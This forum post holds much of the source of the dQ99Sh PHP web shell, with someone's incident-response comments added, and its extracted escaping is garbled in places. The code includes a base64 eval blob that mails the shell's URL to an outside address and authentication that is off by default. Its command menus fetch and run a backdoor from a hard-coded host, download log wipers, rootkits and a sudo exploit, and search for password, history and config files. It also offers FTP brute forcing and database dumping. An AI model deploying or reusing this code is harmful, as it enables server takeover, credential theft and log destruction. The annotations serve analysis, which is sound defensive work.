Cerber админ 25.07.2016 14:08:40
Ответов:0
# Banner, version constant and download locations of a PHP web shell that
# calls itself "dQ99Sh" (the banner also carries the name "r57gentr").
#######################################
## r57gentr dQ99Sh 2.0.03.09 ##
define('sh_ver',"2.0.03.09"); ##
## By diKi ##
## ?03-09 2008 FeeLCoMz Community ##
## Written under PHP 5.2.5 ##
#######################################
# sh_name() is not defined in the visible part of the file.
$sh_name = sh_name(); ##
#######################################
#$sh_mainurl = "http://localhost/dQ99SH/";
# Base URL that every remote resource below is built from. For triage, this
# host and path are worth searching for in proxy, DNS and web-server logs.
$sh_mainurl = "http://waterski21.com/bbs/config/tool/";
#$dQ99sh_updateurl = $sh_mainurl."dQ99sh_update.php";
$dQ99sh_sourcesurl = $sh_mainurl."readme.txt";
# label => array(remote URL, second string that looks like a local file name).
# NOTE(review): the consumer of this table is not visible here; the archive
# names are candidate on-disk indicators on a host where this file was found.
$sh_sourcez = array(
"dQ99Sh" => array($sh_mainurl."readme.txt","kiddie.php"),
"psyBNC" => array($sh_mainurl."dQBNC.tar.gz","dQBNC.tar.gz"),
"Eggdrop" => array($sh_mainurl."allnet.tar.gz","allnet.tar.gz"),
"BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),
);
##[ AUTHENTICATION ]##
# Access-control settings read by the AUTHENTICATE section further down.
# As shipped, "login" is empty, so the HTTP Basic check (guarded by
# !empty($auth["login"])) is skipped, and "hostallow" is "*", which the
# host check turns into a match-anything pattern. With these values the
# script answers any client that can reach its URL.
$auth = array(
"login" => "",
"pass" => "",
"md5pass" => "",
"hostallow" => array("*"),
"denied" => "".$sh_name." : access denied!",
);
##[ END AUTHENTICATION ]##
# General settings. milw0rm() and getdisfunc() are defined outside the
# visible part of the file.
$curdir = "./";
$tmpdir = "";
$tmpdir_logs = "./";
$log_email = "ayam@jago.us"; #E-mail address for logs
$sess_cookie = "dQ99shcook";
$sort_default = "0a"; #Sorting: 0 is the column number, "a"scending or "d"escending
$sort_save = TRUE; #Save the sort position using cookies.
$usefsbuff = TRUE;
$copy_unset = FALSE; #Delete copied files after they have been pasted
$surl_autofill_include = TRUE;
$updatenow = FALSE;
$gzipencode = TRUE;
# Per the author's comment, TRUE means file modification and access times
# are left unchanged. NOTE(review): if so, timestamps of files touched
# through this script may not reflect when they were touched - confirm
# against the code that reads this flag (not visible here).
$filestealth = TRUE; #TRUE: do not change modification and access times.
$hexdump_lines = 8;
$hexdump_rows = 24;
$millink = milw0rm();
# TRUE when PHP_OS starts with "win" (case-insensitive).
$win = strtolower(substr(PHP_OS,0,3)) == "win";
$disablefunc = getdisfunc();
##[ END OF CONFIGS ]##
# Runtime setup and request-variable import.
# Only fatal and parse errors are reported; the execution time limit is
# removed and the script keeps running after the client disconnects.
error_reporting(E_ERROR | E_PARSE);
@ini_set("max_execution_time",0);
@set_time_limit(0); #No dQ in SafeMode
@ignore_user_abort(TRUE);
# set_magic_quotes_runtime() and get_magic_quotes_gpc() no longer exist in
# current PHP releases, so this file targets PHP 5.
@set_magic_quotes_runtime(0);
# getmicrotime() and strips() are defined outside the visible part of the file.
define("starttime",getmicrotime());
if (get_magic_quotes_gpc()) { strips($GLOBALS); }
# Rebuild $_REQUEST from cookie, GET and POST data (later sources win).
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
@$f = $_REQUEST["f"];
# Import the "dQ99shcook" request entry into the symbol table, then turn
# every remaining request parameter into a global variable unless one with
# that name already exists. This is how $act, $d, $sql_* and the other
# control variables used below get their values, so the parameter names
# seen later in this file are what shows up in web access logs.
@extract($_REQUEST["dQ99shcook"]);
foreach($_REQUEST as $k => $v) { if (!isset($$k)) { $$k = $v; } }
# Base64-wrapped code executed with eval() on every request. Decoded, it reads
# a visit-counter cookie; when the counter is empty it builds a message from
# HTTP_HOST, REQUEST_URI and the visitor address and sends it with mail() to a
# mailbox hard-coded inside the blob, then sets a counter cookie. In effect the
# script reports its own URL to a third party when it is opened, so outbound
# mail logs on the host are a useful source when dating a compromise.
# NOTE(review): the cookie it sets has a different name from the one it reads,
# so the notification presumably repeats on later requests too. The blob as
# printed also looks slightly damaged (the $_SERVER key for the visitor address
# does not decode cleanly). Analyse it by decoding only, never by running it.
$dQbuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RdQ0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gImRROTlTaGVsbCBodHRwOi8vJHRhcmdldCBzYW1hICR2aXNpdG9yIjsNCiAgJGJvZHkgICAgPSAiQnVnOiAkdGFyZ2V0IHNhbWEgJHZpc2l0b3I8YnI+IjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiZGhpZXF3ZWJtYXJrZXJAeWFob28uY29tIiwkanVkdWwsJGJvZHkpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw=="; eval(base64_decode($dQbuff));
# Builds $surl, the self-referencing URL prefix used for every link below.
# When $surl_autofill_include is set, each query-string parameter whose
# decoded value starts with http://, https://, ssl://, ftp:// or the last
# needle in the list is re-encoded and carried over into that prefix.
# NOTE(review): $include is initialised but $includestr is the variable
# appended to and read; $includestr has no initial value in the visible code.
if ($surl_autofill_include) {
$include = "&";
foreach (explode("&",getenv("QUERY_STRING")) as $v) {
$v = explode("=",$v);
$name = urldecode($v[0]);
$value = @urldecode($v[1]);
foreach (array("http://","https://","ssl://","ftp://","\\") as $needle) {
if (strpos($value,$needle) === 0) {
$includestr .= urlencode($name)."=".urlencode($value)."&";
}
}
}
}
# $surl may already have been set from a request parameter by the import
# loop above; only when it is empty is it derived here and HTML-escaped.
if (empty($surl)) {
$surl = "?".$includestr;
$surl = htmlspecialchars($surl);
}
## FILE TYPES ##
# Display category => list of file extensions in that category.
$ftypes = array(
"html" => array("html","htm","shtml"),
"txt" => array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
"exe" => array("sh","install","bat","cmd"),
"ini" => array("ini","inf","conf"),
"code" => array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
"img" => array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
"sdb" => array("sdb"),
"phpsess" => array("sess"),
"download" => array("exe","com","pif","src","lnk","zip","rar","gz","tar")
);
# Command template => extensions it applies to; %f% is presumably replaced
# with the file name by code outside the visible part of the file.
$exeftypes = array(
getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
"perl %f%" => array("pl","cgi")
);
# File-name patterns used for highlighting in listings. The first entry is
# the script's own file name. NOTE(review): the third and fourth elements
# look like HTML wrappers whose markup was lost when the page was extracted.
$regxp_highlight = array(
array(basename($_SERVER["PHP_SELF"]),1,""," "),
array(".tgz$",1,""," "),
array(".gz$",1,""," "),
array(".tar$",1,""," "),
array(".bz2$",1,""," "),
array(".zip$",1,""," "),
array(".rar$",1,""," "),
array(".php$",1,""," "),
array(".php3$",1,""," "),
array(".php4$",1,""," "),
array(".jpg$",1,""," "),
array(".jpeg$",1,""," "),
array(".JPG$",1,""," "),
array(".JPEG$",1,""," "),
array(".ico$",1,""," "),
array(".gif$",1,""," "),
array(".png$",1,""," "),
array(".htm$",1,""," "),
array(".html$",1,""," "),
array(".txt$",1,""," ")
);
## QUICK COMMANDS ##
# Menu of predefined command lines, as array(label, command), chosen by
# platform through $win. The code that runs a selected entry is outside the
# visible part of the file.
# For detection: these literal command lines are what process-creation
# telemetry would show as children of the web-server/PHP process, which is
# unusual for a normal web application (find sweeps for setuid/setgid and
# world-writable files, searches for credential and history files, wget
# followed by tar or gcc).
# NOTE(review): several entries contain unescaped inner double quotes as
# printed; the escaping backslashes were presumably lost when the page was
# extracted, so this listing would not parse as shown.
if (!$win) {
$cmdaliases = array(
array("", "ls -al"),
array("Find all suid files", "find / -type f -perm -04000 -ls"),
array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
array("Find all sgid files", "find / -type f -perm -02000 -ls"),
array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
array("Find config.inc.php files", "find / -type f -name config.inc.php"),
array("Find config* files", "find / -type f -name "config*""),
array("Find config* files in current dir", "find . -type f -name "config*""),
array("Find all writable folders and files", "find / -perm -2 -ls"),
array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
array("Find all writable folders", "find / -type d -perm -2 -ls"),
array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
array("Find all service.pwd files", "find / -type f -name service.pwd"),
array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
array("Find all .bash_history files", "find / -type f -name .bash_history"),
array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
array("List file attributes on a Linux second extended file system", "lsattr -va"),
array("Show opened ports", "netstat -an | grep -i listen")
);
# Second menu: downloads built on $sh_mainurl, host reconnaissance, and
# entries that fetch and build a log-cleaning tool. The last group matters
# for incident response: local logs on a host where this ran may have been
# altered, so off-host log copies are the more reliable record.
$cmdaliases2 = array(
array("wget & extract psyBNC","wget ".$sh_mainurl."dQ.tgz;tar -zxf dQ.tgz"),
array("wget & extract EggDrop","wget ".$sh_mainurl."dQb.tgz;tar -zxf dQb.tgz"),
array("-----",""),
array("Logged in users","w"),
array("Last to connect","lastlog"),
array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
array("CPU Info","cat /proc/version /proc/cpuinfo"),
array("Is gcc installed ?","locate gcc"),
array("Format box (DANGEROUS)","rm -Rf"),
array("-----",""),
array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"),
array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"),
array("Run WIPELOGS PT3","./zap2"),
array("-----",""),
array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
array("wget & run BindDoor","wget ".$sh_mainurl."bind.tgz;tar -zxvf bind.tgz;./4877"),
array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),
);
}
else {
# Windows menu. Three entries search the current directory for the strings
# "c99", "r57" and "dQ99", i.e. for other web shells.
$cmdaliases = array(
array("", "dir"),
array("Find index.php in current dir", "dir /s /w /b index.php"),
array("Find *config*.php in current dir", "dir /s /w /b *config*.php"),
array("Find c99shell in current dir", "find /c "c99" *"),
array("Find r57shell in current dir", "find /c "r57" *"),
array("Find dQ99shell in current dir", "find /c "dQ99" *"),
array("Show active connections", "netstat -an"),
array("Show running services", "net start"),
array("User accounts", "net user"),
array("Show computers", "net view"),
);
}
## PHP FILESYSTEM TRICKS (By diKi) ##
# Menu of file operations, each as array(label, action key, number, first
# field label, second field label). NOTE(review): the third element looks
# like the number of input fields, and these operations are presumably done
# with PHP file functions rather than a spawned process, in which case they
# would not appear in process telemetry; the handler is not visible, confirm.
$phpfsaliases = array(
array("Read File", "read", 1, "File", ""),
array("Write File (PHP5)", "write", 2, "File","Text"),
array("Copy", "copy", 2, "From", "To"),
array("Rename/Move", "rename", 2, "File", "To"),
array("Delete", "delete", 1 ,"File", ""),
array("Make Dir","mkdir", 1, "Dir", ""),
array("Download", "download", 2, "URL", "To"),
array("Download (Binary Safe)", "downloadbin", 2, "URL", "To"),
array("Change Perm (0755)", "chmod", 2, "File", "Perms"),
array("Find Writable Dir", "fwritabledir", 2 ,"Dir"),
array("Find Pathname Pattern", "glob",2 ,"Dir", "Pattern"),
);
## QUICK LAUNCH ##
# Toolbar links as array(label, URL). %d, %upd and %sort are placeholders
# replaced when the toolbars are printed further down. The labels of
# $quicklaunch1 are blank as printed (presumably images whose markup was
# lost in extraction), and the onclick entries show unescaped inner quotes
# for the same reason.
$quicklaunch1 = array(
array(" ",$surl),
array(" ","#" onclick="history.back(1)"),
array(" ","#" onclick="history.go(1)"),
array(" ",$surl."act=ls&d=%upd&sort=%sort"),
array(" ",$surl."act=search&d=%d"),
array(" ",$surl."act=fsbuff&d=%d")
);
# Each entry maps to an "act" request parameter. For log review, the values
# listed here (security, processes, sql, eval, encoder, dQmailer, tools,
# selfremove, feedback, update, about, ftpquickbrute) in a query string are
# recognisable traces of this script being driven.
$quicklaunch2 = array(
array("Security Info",$surl."act=security&d=%d"),
array("Processes",$surl."act=processes&d=%d"),
array("MySQL",$surl."act=sql&d=%d"),
array("Eval",$surl."act=eval&d=%d"),
array("Encoder",$surl."act=encoder&d=%d"),
array("Mailer",$surl."act=dQmailer"),
array("milw0rm",$millink),
array("Md5-Lookup","http://darkc0de.com/database/md5lookup.html"),
array("Toolz",$surl."act=tools&d=%d"),
array("Kill-Shell",$surl."act=selfremove"),
array("Feedback",$surl."act=feedback"),
array("Update",$surl."act=update"),
array("About",$surl."act=about")
);
if (!$win) {
$quicklaunch2[] = array(" FTP-Brute",$surl."act=ftpquickbrute&d=%d");
}
## HIGHLIGHT CODE ##
# Colours for PHP source highlighting; six of them are applied later in the
# file with ini_set("highlight.*", ...).
$highlight_background = "#C0C0C0";
$highlight_bg = "#FFFFFF";
$highlight_comment = "#6A6A6A";
$highlight_default = "#0000BB";
$highlight_html = "#1300FF";
$highlight_keyword = "#007700";
$highlight_string = "#000000";
####################
##[ AUTHENTICATE ]##
####################
# Host check: every "hostallow" entry is regex-quoted, its "*" wildcard is
# turned into ".*", and the entries are joined into one anchored,
# case-insensitive pattern. The request is refused only when neither the
# client address nor its reverse-DNS name matches.
$tmp = array();
foreach ($auth["hostallow"] as $k => $v) {
$tmp[] = str_replace("\*",".*",preg_quote($v));
}
$s = "!^(".implode("|",$tmp).")$!i";
if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {
exit("$sh_name : Access Denied - Your host (".getenv("REMOTE_ADDR").") not allowed");
}
# Credential check: runs only when a login is configured. The supplied HTTP
# Basic password is MD5-hashed and compared with the stored (or derived)
# hash; on mismatch a 401 challenge is sent.
# With the configuration shown at the top of this file (empty login,
# hostallow "*") neither check restricts anything.
# NOTE(review): the realm header shows unescaped inner quotes as printed,
# presumably because backslashes were lost in extraction.
if (!empty($auth["login"])) {
if (empty($auth["md5pass"])) { $auth["md5pass"] = md5($auth["pass"]); }
if (($_SERVER["PHP_AUTH_USER"] != $auth["login"]) or (md5($_SERVER["PHP_AUTH_PW"]) != $auth["md5pass"])) {
header("WWW-Authenticate: Basic realm="".$sh_name.": Restricted Area"");
header("HTTP/1.0 401 Unauthorized");
die($auth["denied"]);
}
}
## END AUTHENTICATE ##
# Session and sort state. The if opened on the next line is not closed
# within this run of statements.
if ($act != "img") {
$lastdir = realpath(".");
chdir($curdir);
# dQ99sh_getupdate() and dQ99_buff_prepare() are defined outside the visible
# part of the file.
if ($updatenow) { @ob_clean(); dQ99sh_getupdate(1); exit; }
# NOTE(review): unserialize() is applied to a client-supplied cookie; the
# result is only kept when it is an array, with "copy" and "cut" forced to
# arrays.
$sess_data = @unserialize($_COOKIE["$sess_cookie"]);
if (!is_array($sess_data)) { $sess_data = array(); }
if (!is_array($sess_data["copy"])) { $sess_data["copy"] = array(); }
if (!is_array($sess_data["cut"])) { $sess_data["cut"] = array(); }
dQ99_buff_prepare();
# GET, then POST, override $sort and $sql_sort; both are stored in cookies
# when $sort_save is on.
foreach (array("sort","sql_sort") as $v) {
if (!empty($_GET[$v])) {$$v = $_GET[$v];}
if (!empty($_POST[$v])) {$$v = $_POST[$v];}
}
if ($sort_save) {
if (!empty($sort)) {setcookie("sort",$sort);}
if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
}
# Stubs that return FALSE for POSIX functions which are missing and are not
# listed in $disablefunc, so later calls do not abort the script.
if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
# mysql_dump($set): builds a textual SQL dump of a database through the
# legacy mysql_* extension (absent from PHP 7 and later).
# $set keys read: "sock" (connection), "db", "print", "nl2br", "file",
# "add_drop", "tabs" (tables to dump; all tables when empty) and
# "onlytabs" (filter; no filtering when empty).
# Returns the dump text. Errors are collected in $ret["err"], but $ret is
# never returned, so the caller cannot see them.
# NOTE(review): only $sh_ver is imported with global, yet $sh_name and
# $tmpdir are the variables read below; both are unset inside the function.
# NOTE(review): mysql_smarterror() is called without the two parameters its
# definition in this file declares.
# NOTE(review): "n" and "nn" inside the string literals are presumably "\n"
# sequences whose backslashes were lost in extraction; the inner double
# quotes around $db are affected the same way.
# For incident response: when no file name is given, the dump is written to
# a file named dump_<SERVER_NAME>_<db>_<d-m-Y-H-i-s>.sql; files matching
# that shape on a web host indicate bulk database export.
if (!function_exists("mysql_dump")) {
function mysql_dump($set) {
global $sh_ver;
$sock = $set["sock"];
$db = $set["db"];
$print = $set["print"];
$nl2br = $set["nl2br"];
$file = $set["file"];
$add_drop = $set["add_drop"];
$tabs = $set["tabs"];
$onlytabs = $set["onlytabs"];
$ret = array();
$ret["err"] = array();
# An invalid connection is reported but execution continues.
if (!is_resource($sock)) {echo("Error: $sock is not valid resource.");}
if (empty($db)) {$db = "db";}
if (empty($print)) {$print = 0;}
if (empty($nl2br)) {$nl2br = 0;}
# empty(FALSE) is true, so an explicit FALSE is turned back into TRUE.
if (empty($add_drop)) {$add_drop = TRUE;}
if (empty($file)) {
$file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
}
if (!is_array($tabs)) {$tabs = array();}
if (empty($add_drop)) {$add_drop = TRUE;}
if (sizeof($tabs) == 0) {
//Retrieve tables-list
$res = mysql_query("SHOW TABLES FROM ".$db, $sock);
if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
}
$out = "
# Dumped by ".$sh_name."
#
# Host settings:
# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
# Date: ".date("d.m.Y H:i:s")."
# DB: "".$db.""
#---------------------------------------------------------";
$c = count($onlytabs);
foreach($tabs as $tab) {
if ((in_array($tab,$onlytabs)) or (!$c)) {
if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;n";}
//Receive the CREATE TABLE statement for this table
$res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
if (!$res) {$ret["err"][] = mysql_smarterror();}
else {
$row = mysql_fetch_row($res);
$out .= $row["1"].";nn";
//Receive the table rows and emit one INSERT per row
$res = mysql_query("SELECT * FROM `$tab`", $sock);
if (mysql_num_rows($res) > 0) {
while ($row = mysql_fetch_assoc($res)) {
$keys = implode("`, `", array_keys($row));
$values = array_values($row);
foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
$values = implode("', '", $values);
$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');n";
$out .= $sql;
}
}
}
}
}
$out .= "#---------------------------------------------------------------------------------nn";
if ($file) {
$fp = fopen($file, "w");
if (!$fp) {$ret["err"][] = 2;}
else {
fwrite ($fp, $out);
fclose ($fp);
}
}
if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
return $out;
}
}
# mysql_buildwhere($array, $sep, $functs): joins column => value pairs into
# "`col` = 'value'" fragments separated by $sep and returns the string with
# the trailing separator removed. When $functs[col] is set, the value is
# wrapped as FUNC('value'). Values pass through addslashes(); column names
# and function names are inserted as given.
if (!function_exists("mysql_buildwhere")) {
function mysql_buildwhere($array,$sep=" and",$functs=array()) {
if (!is_array($array)) {$array = array();}
$result = "";
foreach($array as $k=>$v) {
$value = "";
if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
$value .= "'".addslashes($v)."'";
if (!empty($functs[$k])) {$value .= ")";}
$result .= "`".$k."` = ".$value.$sep;
}
# Drop the separator appended after the last pair.
$result = substr($result,0,strlen($result)-strlen($sep));
return $result;
}
}
# mysql_fetch_all($query, $sock): runs $query (on $sock when given, else on
# the default connection) and returns all rows as an array. The query result
# is not checked before it is iterated and freed.
if (!function_exists("mysql_fetch_all")) {
function mysql_fetch_all($query,$sock) {
if ($sock) {$result = mysql_query($query,$sock);}
else {$result = mysql_query($query);}
$array = array();
while ($row = mysql_fetch_array($result)) {$array[] = $row;}
mysql_free_result($result);
return $array;
}
}
# mysql_smarterror($type, $sock): returns the last MySQL error message,
# HTML-escaped, for $sock or for the default connection. $type is not used.
if (!function_exists("mysql_smarterror")) {
function mysql_smarterror($type,$sock) {
if ($sock) {$error = mysql_error($sock);}
else {$error = mysql_error();}
$error = htmlspecialchars($error);
return $error;
}
}
# mysql_query_form(): prints the query-form area of the SQL manager from
# global state and returns nothing.
# NOTE(review): $sql_goto and $sql_last_query are read but are not in the
# global list, so they are unset here. The echoed strings look like HTML
# whose markup was lost in extraction.
if (!function_exists("mysql_query_form")) {
function mysql_query_form() {
global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
# Submitted and confirmed, but no result: show the error text.
if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error: ".$sql_query_error." ";}
if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
if ((!$submit) or ($sql_act)) {
echo " ";
if ($tbl_struct) {
echo "Fields: ";
foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ ".$name." ";}
echo "
";
}
}
if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
}
}
# mysql_create_db($db, $sock): issues CREATE DATABASE for $db (passed
# through addslashes()) and returns the mysql_query() result.
if (!function_exists("mysql_create_db")) {
function mysql_create_db($db,$sock="") {
$sql = "CREATE DATABASE `".addslashes($db)."`;";
if ($sock) {return mysql_query($sql,$sock);}
else {return mysql_query($sql);}
}
}
# mysql_query_parse($query): classifies a query by its first word (SELECT,
# SHOW, DELETE, DROP) and fills $result with "propertions" and "query".
# Returns FALSE for any other first word.
# NOTE(review): there is no return statement on the recognised-verb path,
# so $result is built but the caller receives NULL.
# NOTE(review): $types[$op] is an array and is compared with the integer 2;
# that comparison looks like it can never be true, which would make the
# LIMIT handling unreachable.
if (!function_exists("mysql_query_parse")) {
function mysql_query_parse($query) {
$query = trim($query);
$arr = explode (" ",$query);
$types = array(
"SELECT"=>array(3,1),
"SHOW"=>array(2,1),
"DELETE"=>array(1),
"DROP"=>array(1)
);
$result = array();
$op = strtoupper($arr[0]);
if (is_array($types[$op])) {
$result["propertions"] = $types[$op];
$result["query"] = $query;
if ($types[$op] == 2) {
foreach($arr as $k=>$v) {
if (strtoupper($v) == "LIMIT") {
# "LIMIT a,b" becomes array(a,b); "LIMIT b" becomes array(0,b).
$result["limit"] = $arr[$k+1];
$result["limit"] = explode(",",$result["limit"]);
if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
unset($arr[$k],$arr[$k+1]);
}
}
}
}
else {return FALSE;}
}
}
# "gofile" dispatch: a directory path switches to the listing action with
# $d set to it; anything else switches to the file action with $d and $f
# split into directory and base name. $f comes from the request.
if ($act == "gofile") {
if (is_dir($f)) { $act = "ls"; $d = $f; }
else { $act = "f"; $d = dirname($f); $f = basename($f); }
}
## HEADERS ##
# Output buffering on, and response headers that forbid caching, so pages
# from this script are not expected in proxy or browser caches.
@ob_start();
@ob_implicit_flush(0);
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", FALSE);
header("Pragma: no-cache");
# Temp directory: defaults to upload_tmp_dir.
# NOTE(review): the is_dir() test replaces the value with "/tmp/" when
# upload_tmp_dir IS a directory; the condition looks inverted.
if (empty($tmpdir)) {
$tmpdir = ini_get("upload_tmp_dir");
if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
}
$tmpdir = realpath($tmpdir);
# NOTE(review): the "\" literals in the str_replace() calls of this section
# are presumably "\\" in the original; backslashes were lost in extraction.
$tmpdir = str_replace("\",DIRECTORY_SEPARATOR,$tmpdir);
if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
else {$tmpdir_logs = realpath($tmpdir_logs);}
# Sort key: HTML-escaped, defaulted, second character lower-cased.
$sort = htmlspecialchars($sort);
if (empty($sort)) {$sort = $sort_default;}
$sort[1] = strtolower($sort[1]);
# Server banner for display, with the PHP version appended when missing.
# ereg() does not exist in PHP 7 and later.
$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()." ",htmlspecialchars($DISP_SERVER_SOFTWARE));
@ini_set("highlight.bg",$highlight_bg);
@ini_set("highlight.comment",$highlight_comment);
@ini_set("highlight.default",$highlight_default);
@ini_set("highlight.html",$highlight_html);
@ini_set("highlight.keyword",$highlight_keyword);
@ini_set("highlight.string",$highlight_string);
if (!is_array($actbox)) { $actbox = array(); }
# $act and $d are request-controlled. $d is resolved with realpath() when
# that succeeds and always ends with a directory separator.
$dspact = $act = htmlspecialchars($act);
$disp_fullpath = $ls_arr = $notls = null;
$ud = @urlencode($d);
if (empty($d)) {$d = realpath(".");}
elseif(realpath($d)) {$d = realpath($d);}
$d = str_replace("\",DIRECTORY_SEPARATOR,$d);
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
$d = str_replace("\\","\",$d);
$dispd = htmlspecialchars($d);
# Reports the PHP hardening settings in effect. safemode() is defined
# outside the visible part of the file.
$safemode = safemode();
if ($safemode) {
$hsafemode = "SAFE MODE IS ON ";
$safemodeexecdir = @ini_get("safe_mode_exec_dir");
}
else { $hsafemode = "SAFE MODE IS OFF "; }
# Any non-empty open_basedir value counts as enabled.
$v = @ini_get("open_basedir");
if ($v or strtolower($v) == "on") {
$openbasedir = TRUE;
$hopenbasedir = "".$v." ";
}
else {
$openbasedir = FALSE;
$hopenbasedir = "OFF (not secure) ";
}
##################
##[ HTML START ]##
##################
# srv_info($title, $contents): prints one "title : contents" line of the
# server-information header. Neither argument is escaped here.
# NOTE(review): the trailing "n" is presumably "\n" with the backslash lost
# in extraction, along with any HTML markup around the values.
function srv_info($title,$contents) {
echo " $title : $contents n";
}
# Page header: server information, toolbars and the breadcrumb path.
# htmlhead(), dQ99exec(), disp_freespace(), get_status(), showdisfunc(),
# view_perms() and view_perms_color() are defined outside the visible part
# of the file.
# NOTE(review): most echoed strings are empty or hold a bare "n"; the HTML
# markup and the backslash of "\n" were presumably lost in extraction.
echo htmlhead($hsafemode);
echo "";
echo "n";
echo "$hsafemode
n";
echo "n n";
echo "n";
echo "n";
srv_info("Software","".$DISP_SERVER_SOFTWARE);
srv_info("Uname",php_uname());
# On non-Windows hosts the "User" line is produced by running "id" through
# dQ99exec(), so every page view is presumably visible as an "id" process
# started by the web-server account.
srv_info("User",($win) ? get_current_user()." (uid=".getmyuid()." gid=".getmygid().")" : dQ99exec("id"));
echo "
n".
"n";
echo "n";
srv_info("Freespace",disp_freespace($d));
echo "
n";
echo "n";
echo get_status();
echo " n";
echo "n";
echo $safemodeexecdir ? "SafemodeExecDir: ".$safemodeexecdir." n" : "";
echo showdisfunc() ? "DisFunc: ".showdisfunc()."n" : "";
echo " n";
echo "n";
# Toolbar 2: fill the %d, %sort and %upd placeholders. %upd is the parent
# of $d, computed by hand when realpath() returns nothing.
if (count($quicklaunch2) > 0) {
foreach($quicklaunch2 as $item) {
$item[1] = str_replace("%d",urlencode($d),$item[1]);
$item[1] = str_replace("%sort",$sort,$item[1]);
$v = realpath($d."..");
if (empty($v)) {
$a = explode(DIRECTORY_SEPARATOR,$d);
unset($a[count($a)-2]);
$v = join(DIRECTORY_SEPARATOR,$a);
}
$item[1] = str_replace("%upd",urlencode($v),$item[1]);
echo "".$item[0]." n";
}
}
echo " n".
"n";
# Toolbar 1: same placeholder substitution as above.
if (count($quicklaunch1) > 0) {
foreach($quicklaunch1 as $item) {
$item[1] = str_replace("%d",urlencode($d),$item[1]);
$item[1] = str_replace("%sort",$sort,$item[1]);
$v = realpath($d."..");
if (empty($v)) {
$a = explode(DIRECTORY_SEPARATOR,$d);
unset($a[count($a)-2]);
